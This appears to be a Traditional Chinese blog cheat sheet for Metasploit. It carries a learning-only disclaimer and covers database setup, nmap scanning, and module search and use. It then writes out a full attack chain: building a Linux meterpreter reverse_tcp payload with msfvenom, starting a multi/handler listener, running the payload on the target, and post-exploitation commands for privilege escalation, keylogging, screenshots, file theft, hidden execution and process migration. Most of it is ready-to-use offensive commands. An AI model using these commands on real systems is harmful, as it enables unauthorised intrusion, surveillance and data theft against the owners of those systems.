⚠️ 請注意,本範例僅供學習參考,請遵守相關法令,產生之行為與後果將由使用者自行負責
初始化 PostgreSQL 資料庫
| 12
 3
 4
 5
 6
 7
 8
 9
 10
 11
 12
 13
 14
 15
 
 | 
 msfdb init
 
 
 msfdb reinit
 
 
 msfdb start
 
 
 msfdb stop
 
 
 db_status
 
 | 
nmap 掃描
| 12
 3
 4
 5
 6
 7
 8
 9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 
 | db_nmap --script-updatedb
 
 
 db_nmap -sn [CIDR網段]
 
 
 db_nmap [IP] -p-
 
 
 db_nmap [IP] -p [端口]
 db_nmap [IP] -p [起始端口]-[結束端口]
 db_nmap [IP] -p [端口1],[端口2]
 
 
 db_nmap -sV -p- [IP]
 
 
 db_nmap [IP] -p [端口] -O
 
 
 
 db_nmap -sV --script [漏洞script檔] [IP]
 
 
 db_nmap [IP] -p [端口] -oN result.txt
 db_nmap [IP] -p [端口] -oX result.xml
 
 | 
模組查詢
⭐ 更新可用模組
⭐ 顯示可用模組
| 12
 3
 4
 5
 6
 7
 8
 9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 
 | show auxiliary
 
 
 show exploits
 
 
 show payloads
 
 
 show nops
 
 
 show encoders
 
 
 show evasion
 
 
 show post
 
 | 
⭐ 查找模組
⭐ 模組使用
| 12
 3
 4
 5
 6
 7
 8
 9
 10
 11
 12
 13
 14
 
 | use [模組路徑]
 
 
 info
 
 
 set [參數名] [參數值]
 
 
 show options
 
 
 exploit
 
 | 
滲透操作
⭐ 常用會話接口介紹
| 接口 | 說明 | 
| command shell | 獲得一個命令行界面,允許攻擊者在目標系統上執行命令 | 
| meterpreter | 一種高級的、擴展性強的 payload,提供了豐富的功能,例如文件操作、過程管理、網絡偵查等 | 
| vnc | 在目標系統上開啟一個 VNC 服務器,允許攻擊者遠程查看和控制目標桌面 | 
⭐ 創建 meterpreter 會話接口的 payload :
| 1
 | msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=[監聽機IP位置] LPORT=[監聽機端口] -f elf -o payload.elf
 | 
⭐ 啟動監聽服務,等待遠端執行 meterpreter payload
| 12
 3
 4
 5
 
 | use exploit/multi/handlerset payload linux/x86/meterpreter/reverse_tcp
 set LHOST [監聽機IP位置]
 set LPORT [監聽機端口]
 exploit
 
 | 
⭐ 遠端執行 meterpreter payload
| 12
 3
 4
 
 | chmod +x payload.elf
 
 ./payload.elf
 
 | 
後滲透操作(取得shell後)
獲得會話接口後常用命令
| 12
 3
 4
 5
 6
 7
 8
 9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 
 | sessions -l
 
 
 sessions -i [會話ID]
 
 
 sysinfo
 
 
 getuid
 
 
 getsystem
 
 
 shell
 
 
 keyscan_start、keyscan_stop、keyscan_dump
 
 
 screenshot
 
 
 download [遠程文件路徑] [本地目標路徑]
 upload [本地文件路徑] [遠程目標路徑]
 
 
 execute -f [可執行文件] -H
 
 
 migrate -N [程式]
 
 
 run packetrecorder、run arp_scanner
 
 
 background
 
 |